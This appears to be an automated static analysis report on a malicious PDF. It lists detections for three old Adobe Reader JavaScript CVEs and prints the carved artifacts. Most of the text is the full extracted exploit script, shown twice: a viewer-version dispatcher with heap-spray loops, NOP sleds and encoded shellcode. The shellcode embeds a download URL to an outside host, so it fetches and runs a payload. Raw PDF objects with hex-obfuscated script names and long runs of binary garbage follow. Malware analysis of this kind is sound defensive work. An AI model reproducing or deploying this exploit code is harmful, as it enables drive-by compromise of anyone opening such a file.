Malicious PDF — malware analysis report

Static analysis result for SHA-256 573d47f7ce621f7a…

MALICIOUS

PDF

7.3 KB First seen: 2013-02-18
MD5: 85ef2c0367e755d3748be20b3d207640 SHA-1: 92ffdff5f94492b79fc488d1a0fe9ab0d1dd3abe SHA-256: 573d47f7ce621f7a78a8861cc82a999dd35822e3f86185f9511d6dfd146ded94
612 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 14

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    app.eval();
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILED
    The cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PSSyntaxError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0116_000.js pdf-javascript-stream PDF /JS object 116 at offset 0x497 5586 bytes
SHA-256: 5b3faf20e17804bdb5d0d22585a4d3e1b45462ae05eec1fe0c05df613b04f70f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var KaX=unescape,xFW=app.viewerVersion.toString(),Nbr=KaX("t\h\i\s");Nbr=eval(Nbr);if(xFW<8)
{TeIhR();}
if(xFW>=8&&xFW<9)
{Ygv();}
if(xFW<=9)
{EELLE();}
function NDOjz(hJelR,WrmXP){while(hJelR.length*2<WrmXP){hJelR+=hJelR;}
return hJelR.substring(0,WrmXP/2);}
function TeIhR(){var Abybr=KaX("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0032\u0000\u4715\u4715\u4715\u4715");var TatDN=0x0c0c0c0c;var ehLiP=[];var xLbSX=0x400000;var wPUIt=Abybr.length*2;var WrmXP=xLbSX-(wPUIt+0x38);var hJelR=KaX("\u9090\u9090");hJelR=NDOjz(hJelR,WrmXP);var BQrnN=(TatDN-0x400000)/xLbSX;for(var xzbiZ=0;xzbiZ<BQrnN;xzbiZ++){ehLiP[xzbiZ]=hJelR+Abybr;}
var ULlYf=KaX("\u0c0c\u0c0c");while(ULlYf.length<44952)ULlYf+=ULlYf;this.collabStore=Collab.collectEmailInfo({subj:"",msg:ULlYf});}
function Ygv(){var jMB=new Array();function AyL(QFc,Ppm){while(QFc.length*2<Ppm){QFc+=QFc;}
QFc=QFc.substring(0,Ppm/2);return QFc;}
fXC=0x30303030;WwI=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0031\u0000\u0000%17%35%17%35%17%35%17%35");var bSi=0x400000;var vJX=WwI.length*2;var Ppm=bSi-(vJX+0x38);var QFc=KaX("\u9090\u9090");QFc=AyL(QFc,Ppm);var coN=(fXC-0x400000)/bSi;for(var CDY=0;CDY<coN;CDY++){jMB[CDY]=QFc+WwI;}
var KXz="86858718733100516971";for(KaX=0;KaX<138*2;KaX++){KXz+="1";}
util.printf("%4"+"50"+"00"+"f",KXz);}
function sqt(DmQ)
{DmQ=DmQ.replace(/[\+1]/g,"0");DmQ=DmQ.replace(/[\+2]/g,"9");DmQ=DmQ.replace(/[\+3]/g,"8");DmQ=DmQ.replace(/[\+4]/g,"7");DmQ=DmQ.replace(/[\+5]/g,"6");DmQ=DmQ.replace(/[\+6]/g,"5");DmQ=DmQ.replace(/[\+7]/g,"4");DmQ=DmQ.replace(/[\+8]/g,"3");DmQ=DmQ.replace(/[\+9]/g,"2");DmQ=DmQ.replace(/[\+0]/g,"1");return DmQ;}
function EELLE(){var BmuXD=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0033\u0000\x15\x20\x15\x20\x15\x20\x15\x20");gVf=KaX("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BmuXD;KBY=KaX("\u9090\u9090");frL=5*2;wFM=frL+gVf.length;while(KBY.length<wFM)KBY+=KBY;elW=KBY.substring(0,wFM);ZTJ=KBY.substring(0,KBY.length-wFM);while(ZTJ.length+wFM<0x40000)ZTJ=ZTJ+ZTJ+elW;JCe=[];for(Uwp=0;Uwp<180;Uwp++)JCe[Uwp]=ZTJ+gVf;var ysT=4012;var WDe=Array(ysT);for(Uwp=0;Uwp<ysT;Uwp++)
{WDe[Uwp]=KaX("\u000a\u000a\u000a\u000a");}
Collab.getIcon(WDe+"_N"+".b"+"un"+"dl"+"e");}
javascript_obj0123_002.js pdf-javascript-stream PDF /JS object 123 at offset 0x36E 6553 bytes
SHA-256: 27287dccdab421c51eb05eeb27de63081492846d2276a6306466f5dc90c64036
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД"  –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ   ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 1000+987>>
stream
x^�W[o � ~ϯ@�X�� z��/�� in- � X`	KБ�3I� '��$ ����U;!^�۾� �Դ�^�]U�  �� O�{�r�] �ϻͫ� ��o}�t����n~19�m-�^.��q ���`^@��[��O�/z� Q����`49�Cɶ l\��vN~� F_6"�_���' s �  �C�.�k���V�G��� � <k���s��I7�m���t�����d2�"jk�͎ '?��+�`��|�f�-��ك�{�<��a���q�fj��5�R |�	t ��L�C �j �� �����^U U��l�  �R��B	��_��ք!��r�M�Z�Xی��%` l �i����m�ȩ�S�G�*'�&�Ԥ�u�"O"���,�%'��#�5�*�
OB���Kr&ʀ�\ڈu�k:aK)r���N/�4l�s2� �2�?� �(E��r�!@�q�y(Sd�ڄ�se�$d���U	=�%:�մX	O��o�
��*`���h˻
0� �<�
��J�����AS[ZR*
V<�T �O$��_�� ����ʶ�U%�� ���{]�<	��)���Nrd/���W< ��o��e   c<!ߍ� _��F�r����VS3?U��O�*`�COU3"���9v � ��y
� )�@n������5��  l�(�d��=�麍�l���b�Z�� ��#�����T��[�$�Z��1�ͤ"\���2R� +���� �C�����y�'Ж�rZj漩�)m� ��%�1�cV�\� 0 � L� >� ��I� �[�-C�󐴊�O ����_ ��Wfe �>אju�� DIA�Ni��"�H%)OiS�?�K$ 3�(�x%'�� ���  v	�Yd�)'g[3Kmʓ�-�I����fM|.<�B��e��N�C?��-  6�� �K[��3א�]�t�e� �M#>X ��<�� �  �� � ��� �
1�ر_� ͳB]���_�����y�����=x� ��ڔ�.���Y ��oG� d> "�/\Cu�}4%�$NAl��� ! ��og��U/�gE_ }t���   ������� � �w[D�z8 \K8����8��;& e_�N� ���  q��+�L����βܤ A
 �� '���ó�t|�rq6�Zւ�  ��x2ݙ ���1J?���m�^ �"�_�&��v�� ~��Yw����ǟ0�o�z�i��" n>??�����u�  �a �� �Z ��� _
��w�Wc����Go.wn R+Ne/��U�MS�C
dʳ�*��Jj�]_�8�� � ��+����Ք5�R�Ԑ2e�jL N�4�>Bj&sڤ������ N���  ǵ��:�h�JP�^ �^�,�( V�&&�y�� # ��-'k�*�i��S���{j�Cͩ�9�3%w�xw� �3��ږuuc��lk�u��W x���6H*��^qV�@N� *�7"� l!jT�� d}Y���m	� � �@� � ���  
��n  �� aK�c��S)�}ɾ�����3 �V�D �-�
N[;h3 ��o�jyӊ7�U�U o㩀���_w�Ne�4oi:��M @m�-
	"
�颶x 4N��SOh�j%K�x����@
��� {�� ԑy��# >L�Cm����|�r��s?>�+P��� �\��Q �;��U��>K�� "��� � � ��B�mg���諀�`�  �� ���[��j�I��}.z ��;ܬ�N�2��]� u|2� �v���)WT �a� ϗ��b2�:�ccq��=�zÞQ �਷	ε�y��ߜ��  ���ּ;�� ���w������� �����P�{�Z�� j&Tw � ��C�B5�P�P�{�^�� j.�� � j ��#)w_��G����t���  ? �� �^��я p� � .'�|Q�ǿ��H�ޔ�ޚ ��?2�  �ێ�Vo�;��滅��� � X q2Vw��� �7� � �sX ��� ~׮�d ����7��J 	O|��s�z ����5� �
� +�'u��"G���s�x����   �wX�  �/��O ��L%i|66] �:@㵳� ����k0FU��
�i,5� Q?_6V���n�sx6�Cr���3�#�  �3��N :r� =Wj�x�K K�v�L+�)w�M�	�
��rN�, I��8 vB"%
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefxګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 116 at offset 0x497 5565 bytes
SHA-256: 5ee865de78f8b2e317ba627a538142ce62a92245168de6494dd3bdf8c63f53d4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var KaX=unescape,xFW=app.viewerVersion.toString(),Nbr=KaX("t\h\i\s");Nbr=eval(Nbr);if(xFW<8)
{TeIhR();}
if(xFW>=8&&xFW<9)
{Ygv();}
if(xFW<=9)
{EELLE();}
function NDOjz(hJelR,WrmXP){while(hJelR.length*2<WrmXP){hJelR+=hJelR;}
return hJelR.substring(0,WrmXP/2);}
function TeIhR(){var Abybr=KaX("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0032\u0000\u4715\u4715\u4715\u4715");var TatDN=0x0c0c0c0c;var ehLiP=[];var xLbSX=0x400000;var wPUIt=Abybr.length*2;var WrmXP=xLbSX-(wPUIt+0x38);var hJelR=KaX("\u9090\u9090");hJelR=NDOjz(hJelR,WrmXP);var BQrnN=(TatDN-0x400000)/xLbSX;for(var xzbiZ=0;xzbiZ<BQrnN;xzbiZ++){ehLiP[xzbiZ]=hJelR+Abybr;}
var ULlYf=KaX("\u0c0c\u0c0c");while(ULlYf.length<44952)ULlYf+=ULlYf;this.collabStore=Collab.collectEmailInfo({subj:"",msg:ULlYf});}
function Ygv(){var jMB=new Array();function AyL(QFc,Ppm){while(QFc.length*2<Ppm){QFc+=QFc;}
QFc=QFc.substring(0,Ppm/2);return QFc;}
fXC=0x30303030;WwI=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0031\u0000\u0000%17%35%17%35%17%35%17%35");var bSi=0x400000;var vJX=WwI.length*2;var Ppm=bSi-(vJX+0x38);var QFc=KaX("\u9090\u9090");QFc=AyL(QFc,Ppm);var coN=(fXC-0x400000)/bSi;for(var CDY=0;CDY<coN;CDY++){jMB[CDY]=QFc+WwI;}
var KXz="86858718733100516971";for(KaX=0;KaX<138*2;KaX++){KXz+="1";}
util.printf("%45000f",KXz);}
function sqt(DmQ)
{DmQ=DmQ.replace(/[\+1]/g,"0");DmQ=DmQ.replace(/[\+2]/g,"9");DmQ=DmQ.replace(/[\+3]/g,"8");DmQ=DmQ.replace(/[\+4]/g,"7");DmQ=DmQ.replace(/[\+5]/g,"6");DmQ=DmQ.replace(/[\+6]/g,"5");DmQ=DmQ.replace(/[\+7]/g,"4");DmQ=DmQ.replace(/[\+8]/g,"3");DmQ=DmQ.replace(/[\+9]/g,"2");DmQ=DmQ.replace(/[\+0]/g,"1");return DmQ;}
